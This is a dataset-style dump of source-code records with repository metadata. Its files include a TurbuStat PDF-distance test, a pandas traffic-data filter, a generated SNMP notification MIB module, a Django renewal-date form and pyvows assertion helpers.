blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
616
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
777 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
149 values
src_encoding
stringclasses
26 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.2M
extension
stringclasses
188 values
content
stringlengths
3
10.2M
authors
sequencelengths
1
1
author_id
stringlengths
1
132
e7289fa1f549284d7e98f8964c2d31047a9bc6da
7c2c36ebf1a28a1b3990578bb59883d0a5fe74e6
/turbustat/tests/test_pdf.py
3ab83d5028113dcd19cf5de8be96265696ed77af
[ "MIT" ]
permissive
hopehhchen/TurbuStat
1ebb6dbdd9e80fcacc0e4ed75359909a1bad8a4d
3793c8b3a6deb4c14b1388b5290a21d93f1697cf
refs/heads/master
2020-07-09T23:58:07.035643
2015-06-08T14:43:38
2015-06-08T14:43:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,371
py
# Licensed under an MIT open source license - see LICENSE from unittest import TestCase import numpy as np import numpy.testing as npt from ..statistics.pdf import PDF, PDF_Distance from ._testing_data import \ dataset1, dataset2, computed_data, computed_distances class testPDF(TestCase): def setUp(self): self.dataset1 = dataset1 self.dataset2 = dataset2 def test_PDF_distance(self): self.test_dist = \ PDF_Distance(self.dataset1["integrated_intensity"][0], self.dataset2["integrated_intensity"][0], min_val1=0.05, min_val2=0.05, weights1=self.dataset1["integrated_intensity_error"][0] ** -2., weights2=self.dataset2["integrated_intensity_error"][0] ** -2.) self.test_dist.distance_metric() assert np.allclose(self.test_dist.PDF1.pdf, computed_data["pdf_val"]) npt.assert_almost_equal(self.test_dist.hellinger_distance, computed_distances['pdf_hellinger_distance']) npt.assert_almost_equal(self.test_dist.ks_distance, computed_distances['pdf_ks_distance']) npt.assert_almost_equal(self.test_dist.ad_distance, computed_distances['pdf_ad_distance'])
83ac34c589d3f1a44e27f059c40cebcdad36f63d
b54d6a18bc5e86462c1f085386bc48065db5851c
/targetDF.py
0c442099cfd980035cfa5306b1d087212fa72489
[]
no_license
zoshs2/Percolation_Seoul
5b5b8ebabe186fbc9e265fc190c3d0641e196517
69c0aa99d1f7a2fb9259681a1ed63794cbe5ea5c
refs/heads/main
2023-07-28T20:50:13.393765
2021-09-28T13:25:31
2021-09-28T13:25:31
390,687,544
1
0
null
null
null
null
UTF-8
Python
false
false
1,030
py
import pandas as pd def targetDF(dataset, YEAR, MONTH, DAY, HOUR=False, MINUTE=False) -> pd.DataFrame: ''' Return pd.DataFrame with only data that we concerned. Example ------- In[0] date_dataset = targetDF(dataset, 2021, 2, 1) In[1] date_dataset = extract_ratio_df(date_dataset) # Generate a ratio column In[2] time_dataset = targetDF(date_dataset, 2021, 2, 1, 9, 0) # 2021-02-01 / 09:00 AM In[3] CheckOverRatio(time_dataset) # Check over ratio raws & do the correction by inplacing. ''' if (HOUR is not False) & (MINUTE is not False): vel_target = dataset[(dataset['PRCS_YEAR']==YEAR) & (dataset['PRCS_MON']==MONTH) & (dataset['PRCS_DAY']==DAY) & (dataset['PRCS_HH']==HOUR) & (dataset['PRCS_MIN']==MINUTE)] vel_target = vel_target.reset_index(drop=True) return vel_target vel_target = dataset[(dataset['PRCS_YEAR']==YEAR) & (dataset['PRCS_MON']==MONTH) & (dataset['PRCS_DAY']==DAY)] vel_target = vel_target.reset_index(drop=True) return vel_target
47ea363768f04b52b108cc1522373cc3a8f7d61a
85a9ffeccb64f6159adbd164ff98edf4ac315e33
/pysnmp/BAY-STACK-NOTIFICATIONS-MIB.py
9fe6dd9a7f0564c4dc72d5d5ffd161421012167e
[ "Apache-2.0" ]
permissive
agustinhenze/mibs.snmplabs.com
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
1fc5c07860542b89212f4c8ab807057d9a9206c7
refs/heads/master
2020-12-26T12:41:41.132395
2019-08-16T15:51:41
2019-08-16T15:53:57
237,512,469
0
0
Apache-2.0
2020-01-31T20:41:36
2020-01-31T20:41:35
null
UTF-8
Python
false
false
19,230
py
# # PySNMP MIB module BAY-STACK-NOTIFICATIONS-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/BAY-STACK-NOTIFICATIONS-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 17:19:14 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueSizeConstraint, ValueRangeConstraint, SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection") bayStackConfigExpectedStackSize, bayStackUnitConfigIndex = mibBuilder.importSymbols("BAY-STACK-MIB", "bayStackConfigExpectedStackSize", "bayStackUnitConfigIndex") dot1xAuthBackendAuthState, dot1xAuthPaeState = mibBuilder.importSymbols("IEEE8021-PAE-MIB", "dot1xAuthBackendAuthState", "dot1xAuthPaeState") ifIndex, ifAdminStatus, InterfaceIndex = mibBuilder.importSymbols("IF-MIB", "ifIndex", "ifAdminStatus", "InterfaceIndex") InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType") s5AgSysUsbTargetUnit, s5AgentScriptStatus = mibBuilder.importSymbols("S5-AGENT-MIB", "s5AgSysUsbTargetUnit", "s5AgentScriptStatus") s5ChasComType, = mibBuilder.importSymbols("S5-CHASSIS-MIB", "s5ChasComType") SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") ObjectIdentity, MibIdentifier, Bits, iso, Counter32, Gauge32, IpAddress, ModuleIdentity, NotificationType, Unsigned32, Counter64, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks = 
mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "MibIdentifier", "Bits", "iso", "Counter32", "Gauge32", "IpAddress", "ModuleIdentity", "NotificationType", "Unsigned32", "Counter64", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks") MacAddress, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "MacAddress", "TextualConvention", "DisplayString") bayStackMibs, = mibBuilder.importSymbols("SYNOPTICS-ROOT-MIB", "bayStackMibs") bayStackNotificationsMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 45, 5, 2)) bayStackNotificationsMib.setRevisions(('2014-07-07 00:00', '2014-01-27 00:00', '2013-10-11 00:00', '2013-08-22 00:00', '2013-03-19 00:00', '2012-09-04 00:00', '2012-08-22 00:00', '2012-08-16 00:00', '2012-06-21 00:00', '2012-06-20 00:00', '2011-11-30 00:00', '2010-12-21 00:00', '2009-09-28 00:00', '2008-07-09 00:00', '2008-03-31 00:00', '2007-03-05 00:00', '2006-04-06 00:00', '2006-04-04 00:00', '2005-08-22 00:00', '2005-06-30 00:00', '2005-03-26 00:00', '2004-08-06 00:00', '2004-08-02 00:00', '2004-07-20 00:00', '2003-03-16 00:00',)) if mibBuilder.loadTexts: bayStackNotificationsMib.setLastUpdated('201407070000Z') if mibBuilder.loadTexts: bayStackNotificationsMib.setOrganization('Avaya') bsnObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 2, 1)) bsnNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 2, 2)) bsnNotifications0 = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0)) bsnEapAccessViolationMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 1), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapAccessViolationMacAddress.setStatus('current') bsnLoginFailureType = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("telnet", 1), ("ssh", 2), ("web", 3), ("serialConsole", 4)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: 
bsnLoginFailureType.setStatus('current') bsnLoginFailureAddressType = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 3), InetAddressType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnLoginFailureAddressType.setStatus('current') bsnLoginFailureAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 4), InetAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnLoginFailureAddress.setStatus('current') bsnLoginFailureUsername = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 5), SnmpAdminString()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnLoginFailureUsername.setStatus('current') bsnActualStackSize = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnActualStackSize.setStatus('current') bsnEapUbpFailureIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 7), InterfaceIndex()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapUbpFailureIfIndex.setStatus('current') bsnEapUbpFailureMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 8), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapUbpFailureMacAddress.setStatus('current') bsnEapUbpFailureRoleString = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 9), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapUbpFailureRoleString.setStatus('current') bsnTrialLicenseExpirationTime = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 30))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnTrialLicenseExpirationTime.setStatus('current') bsnTrialLicenseExpirationNumber = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 10))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: 
bsnTrialLicenseExpirationNumber.setStatus('current') bsnEnteredForcedStackModeMAC = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 12), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEnteredForcedStackModeMAC.setStatus('current') bsnEapRAVErrorMacAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 13), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapRAVErrorMacAddress.setStatus('current') bsnEapRAVErrorPort = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 14), InterfaceIndex()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEapRAVErrorPort.setStatus('current') bsnEnteredForcedStackModeAddressType = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 15), InetAddressType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEnteredForcedStackModeAddressType.setStatus('current') bsnEnteredForcedStackModeAddress = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 16), InetAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnEnteredForcedStackModeAddress.setStatus('current') bsnStackProtectionEvent = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("cannotJoinStack", 1), ("unitIgnored", 2)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnStackProtectionEvent.setStatus('current') bsnUSBInfo = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 18), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnUSBInfo.setStatus('current') bsnSFPInfo = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 19), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnSFPInfo.setStatus('current') bsnAaaUserName = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 2, 1, 20), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(10, 
16))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: bsnAaaUserName.setStatus('current') bsnConfigurationSavedToNvram = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 1)) if mibBuilder.loadTexts: bsnConfigurationSavedToNvram.setStatus('current') bsnEapAccessViolation = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 2)).setObjects(("IEEE8021-PAE-MIB", "dot1xAuthPaeState"), ("IEEE8021-PAE-MIB", "dot1xAuthBackendAuthState"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapAccessViolationMacAddress")) if mibBuilder.loadTexts: bsnEapAccessViolation.setStatus('current') bsnPortSpeedDuplexMismatch = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 3)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnPortSpeedDuplexMismatch.setStatus('current') bsnStackManagerReconfiguration = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 4)) if mibBuilder.loadTexts: bsnStackManagerReconfiguration.setStatus('current') bsnLacTrunkUnavailable = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 5)) if mibBuilder.loadTexts: bsnLacTrunkUnavailable.setStatus('current') bsnLoginFailure = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 6)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnLoginFailureType"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnLoginFailureAddressType"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnLoginFailureAddress"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnLoginFailureUsername")) if mibBuilder.loadTexts: bsnLoginFailure.setStatus('current') bsnMLTHealthFailure = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 7)).setObjects(("IF-MIB", "ifAdminStatus")) if mibBuilder.loadTexts: bsnMLTHealthFailure.setStatus('current') bsnTrunkPortDisabledToPreventBroadcastStorm = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 8)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnTrunkPortDisabledToPreventBroadcastStorm.setStatus('current') bsnLacPortDisabledToPreventBroadcastStorm = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 
9)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnLacPortDisabledToPreventBroadcastStorm.setStatus('current') bsnTrunkPortEnabledToPreventBroadcastStorm = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 10)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnTrunkPortEnabledToPreventBroadcastStorm.setStatus('current') bsnLacPortDisabledDueToLossOfVLACPDU = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 11)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnLacPortDisabledDueToLossOfVLACPDU.setStatus('current') bsnLacPortEnabledDueToReceiptOfVLACPDU = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 12)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnLacPortEnabledDueToReceiptOfVLACPDU.setStatus('current') bsnStackConfigurationError = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 13)).setObjects(("BAY-STACK-MIB", "bayStackConfigExpectedStackSize"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnActualStackSize")) if mibBuilder.loadTexts: bsnStackConfigurationError.setStatus('current') bsnEapUbpFailure = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 14)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapUbpFailureIfIndex"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapUbpFailureMacAddress"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapUbpFailureRoleString")) if mibBuilder.loadTexts: bsnEapUbpFailure.setStatus('current') bsnTrialLicenseExpiration = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 15)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnTrialLicenseExpirationTime"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnTrialLicenseExpirationNumber")) if mibBuilder.loadTexts: bsnTrialLicenseExpiration.setStatus('current') bsnEnteredForcedStackMode = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 16)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnEnteredForcedStackModeMAC"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEnteredForcedStackModeAddressType"), ("BAY-STACK-NOTIFICATIONS-MIB", 
"bsnEnteredForcedStackModeAddress")) if mibBuilder.loadTexts: bsnEnteredForcedStackMode.setStatus('current') bsnTemperatureExceeded = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 17)).setObjects(("S5-CHASSIS-MIB", "s5ChasComType")) if mibBuilder.loadTexts: bsnTemperatureExceeded.setStatus('current') bsnEapRAVError = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 18)).setObjects(("IEEE8021-PAE-MIB", "dot1xAuthPaeState"), ("IEEE8021-PAE-MIB", "dot1xAuthBackendAuthState"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapRAVErrorMacAddress"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnEapRAVErrorPort")) if mibBuilder.loadTexts: bsnEapRAVError.setStatus('current') bsnEapRateLimitExceeded = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 19)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnEapRateLimitExceeded.setStatus('current') bsnSystemUp365Days = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 20)).setObjects(("BAY-STACK-MIB", "bayStackUnitConfigIndex")) if mibBuilder.loadTexts: bsnSystemUp365Days.setStatus('current') bsnUSBInsertion = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 21)).setObjects(("S5-AGENT-MIB", "s5AgSysUsbTargetUnit"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnUSBInfo")) if mibBuilder.loadTexts: bsnUSBInsertion.setStatus('current') bsnUSBRemoval = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 22)).setObjects(("S5-AGENT-MIB", "s5AgSysUsbTargetUnit")) if mibBuilder.loadTexts: bsnUSBRemoval.setStatus('current') bsnSFPInsertion = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 23)).setObjects(("IF-MIB", "ifIndex"), ("BAY-STACK-NOTIFICATIONS-MIB", "bsnSFPInfo")) if mibBuilder.loadTexts: bsnSFPInsertion.setStatus('current') bsnSFPRemoval = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 24)).setObjects(("IF-MIB", "ifIndex")) if mibBuilder.loadTexts: bsnSFPRemoval.setStatus('current') bsnROPasswordExpired = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 25)) if mibBuilder.loadTexts: 
bsnROPasswordExpired.setStatus('current') bsnRWPasswordExpired = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 26)) if mibBuilder.loadTexts: bsnRWPasswordExpired.setStatus('current') bsnStackProtection = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 27)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnStackProtectionEvent")) if mibBuilder.loadTexts: bsnStackProtection.setStatus('current') bsnRunScripts = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 28)).setObjects(("S5-AGENT-MIB", "s5AgentScriptStatus")) if mibBuilder.loadTexts: bsnRunScripts.setStatus('current') bsnAaaUserAccountNotUsed = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 29)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaUserAccountNotUsed.setStatus('current') bsnAaaAlreadyConnected = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 30)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaAlreadyConnected.setStatus('current') bsnAaaIncorrectLogOnThresholdExceeded = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 31)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaIncorrectLogOnThresholdExceeded.setStatus('current') bsnAaaMaxNoOfSessionsExceeded = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 32)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaMaxNoOfSessionsExceeded.setStatus('current') bsnAuditUnsentMessages = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 33)) if mibBuilder.loadTexts: bsnAuditUnsentMessages.setStatus('current') bsnAuditRecordEventsFailure = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 34)) if mibBuilder.loadTexts: bsnAuditRecordEventsFailure.setStatus('current') bsnAuditStartUpTrap = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 35)) if mibBuilder.loadTexts: bsnAuditStartUpTrap.setStatus('current') bsnAuditShutDownTrap = NotificationType((1, 3, 6, 1, 
4, 1, 45, 5, 2, 2, 0, 36)) if mibBuilder.loadTexts: bsnAuditShutDownTrap.setStatus('current') bsnAaaUserPasswordExpired = NotificationType((1, 3, 6, 1, 4, 1, 45, 5, 2, 2, 0, 37)).setObjects(("BAY-STACK-NOTIFICATIONS-MIB", "bsnAaaUserName")) if mibBuilder.loadTexts: bsnAaaUserPasswordExpired.setStatus('current') mibBuilder.exportSymbols("BAY-STACK-NOTIFICATIONS-MIB", bsnActualStackSize=bsnActualStackSize, bsnSFPInsertion=bsnSFPInsertion, bsnLacPortDisabledToPreventBroadcastStorm=bsnLacPortDisabledToPreventBroadcastStorm, bsnLoginFailureUsername=bsnLoginFailureUsername, bsnROPasswordExpired=bsnROPasswordExpired, bsnEapAccessViolationMacAddress=bsnEapAccessViolationMacAddress, bsnAaaMaxNoOfSessionsExceeded=bsnAaaMaxNoOfSessionsExceeded, bsnAuditStartUpTrap=bsnAuditStartUpTrap, bsnStackManagerReconfiguration=bsnStackManagerReconfiguration, bsnAuditShutDownTrap=bsnAuditShutDownTrap, bsnEnteredForcedStackModeMAC=bsnEnteredForcedStackModeMAC, bsnTrialLicenseExpirationNumber=bsnTrialLicenseExpirationNumber, bsnEapRAVErrorPort=bsnEapRAVErrorPort, bsnEnteredForcedStackModeAddress=bsnEnteredForcedStackModeAddress, bsnConfigurationSavedToNvram=bsnConfigurationSavedToNvram, bsnObjects=bsnObjects, bsnUSBRemoval=bsnUSBRemoval, bsnTrialLicenseExpirationTime=bsnTrialLicenseExpirationTime, bsnMLTHealthFailure=bsnMLTHealthFailure, bsnUSBInsertion=bsnUSBInsertion, bsnLacPortDisabledDueToLossOfVLACPDU=bsnLacPortDisabledDueToLossOfVLACPDU, bayStackNotificationsMib=bayStackNotificationsMib, bsnLacTrunkUnavailable=bsnLacTrunkUnavailable, bsnEapRateLimitExceeded=bsnEapRateLimitExceeded, bsnEnteredForcedStackModeAddressType=bsnEnteredForcedStackModeAddressType, bsnStackConfigurationError=bsnStackConfigurationError, bsnLoginFailureType=bsnLoginFailureType, bsnTemperatureExceeded=bsnTemperatureExceeded, bsnEapUbpFailureRoleString=bsnEapUbpFailureRoleString, bsnSystemUp365Days=bsnSystemUp365Days, bsnAaaAlreadyConnected=bsnAaaAlreadyConnected, 
bsnEapUbpFailureMacAddress=bsnEapUbpFailureMacAddress, bsnAaaIncorrectLogOnThresholdExceeded=bsnAaaIncorrectLogOnThresholdExceeded, bsnEapRAVError=bsnEapRAVError, bsnAuditRecordEventsFailure=bsnAuditRecordEventsFailure, bsnEapUbpFailure=bsnEapUbpFailure, bsnRunScripts=bsnRunScripts, bsnStackProtectionEvent=bsnStackProtectionEvent, bsnAaaUserPasswordExpired=bsnAaaUserPasswordExpired, bsnNotifications0=bsnNotifications0, bsnLoginFailureAddress=bsnLoginFailureAddress, bsnEnteredForcedStackMode=bsnEnteredForcedStackMode, bsnStackProtection=bsnStackProtection, bsnAuditUnsentMessages=bsnAuditUnsentMessages, bsnNotifications=bsnNotifications, bsnLacPortEnabledDueToReceiptOfVLACPDU=bsnLacPortEnabledDueToReceiptOfVLACPDU, bsnSFPInfo=bsnSFPInfo, bsnLoginFailure=bsnLoginFailure, bsnTrialLicenseExpiration=bsnTrialLicenseExpiration, bsnEapAccessViolation=bsnEapAccessViolation, bsnRWPasswordExpired=bsnRWPasswordExpired, bsnEapUbpFailureIfIndex=bsnEapUbpFailureIfIndex, bsnTrunkPortEnabledToPreventBroadcastStorm=bsnTrunkPortEnabledToPreventBroadcastStorm, bsnPortSpeedDuplexMismatch=bsnPortSpeedDuplexMismatch, bsnEapRAVErrorMacAddress=bsnEapRAVErrorMacAddress, PYSNMP_MODULE_ID=bayStackNotificationsMib, bsnTrunkPortDisabledToPreventBroadcastStorm=bsnTrunkPortDisabledToPreventBroadcastStorm, bsnAaaUserName=bsnAaaUserName, bsnLoginFailureAddressType=bsnLoginFailureAddressType, bsnAaaUserAccountNotUsed=bsnAaaUserAccountNotUsed, bsnUSBInfo=bsnUSBInfo, bsnSFPRemoval=bsnSFPRemoval)
e3af53fba43b0b71ce8efca13bf2a89e6455544d
cea45595be3e9ff0daa09b4443c7220368e5c512
/catalog/forms.py
d17b59b3d29f1d2a4beed6697d06d27d5e996bb9
[]
no_license
VladyslavHnatchenko/mdn
7b65ecf2e73eff2533aae4ffe5ad6a5a928750d9
f74736aeaf8c4b8ca51889c1a00571cb07f6dba2
refs/heads/master
2020-04-18T02:16:08.622726
2019-02-15T13:37:49
2019-02-15T13:37:49
167,149,898
0
0
null
null
null
null
UTF-8
Python
false
false
919
py
import datetime from django import forms from django.core.exceptions import ValidationError from django.utils.translation import ugettext_lazy as _ class RenewBookForm(forms.Form): renewal_date = forms.DateField(help_text="Enter a date between now and" " 4 weeks (default 3).") def clean_renewal_date(self): data = self.cleaned_data['renewal_date'] # Check if a date is not in the past. if data < datetime.date.today(): raise ValidationError(_('Invalid date - renewal in past')) # Check if a date is in the allowed range (+4 weeks from today). if data > datetime.date.today() + datetime.timedelta(weeks=4): raise ValidationError(_('Invalid date - renewal more than 4 weeks ' 'ahead')) # Remember to always return the cleaned data. return data
3170c04749e484a7ed6bc52dc2aac6b927bdd8f1
29790e8faa702dc52ff2ebf905d15ff8c6cfcda9
/pyvows/assertions/inclusion.py
fc1d51ea05f322686a78849c17c541a6ad3d37a1
[]
no_license
scraping-xx/pyvows
0227a2b3f16bcf562acb48902ed3c58d6e616791
b03e9bed37b93f24eca1dd910c05e78e81969ca2
refs/heads/master
2020-12-01T01:15:09.487368
2011-08-16T03:36:57
2011-08-16T03:36:57
null
0
0
null
null
null
null
UTF-8
Python
false
false
633
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # pyVows testing engine # https://github.com/heynemann/pyvows # Licensed under the MIT license: # http://www.opensource.org/licenses/mit-license # Copyright (c) 2011 Bernardo Heynemann [email protected] from pyvows import Vows @Vows.assertion def to_include(topic, expected): message = "Expected topic(%s) to include %s, but it didn't" % (topic, expected) assert expected in topic, message @Vows.assertion def not_to_include(topic, expected): message = "Expected topic(%s) not to include %s, but it did" % (topic, expected) assert expected not in topic, message
371e2253a9dfed238c59e6c0d05d3ff759ba2f77
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
/cases/synthetic/coverage-big-1134.py
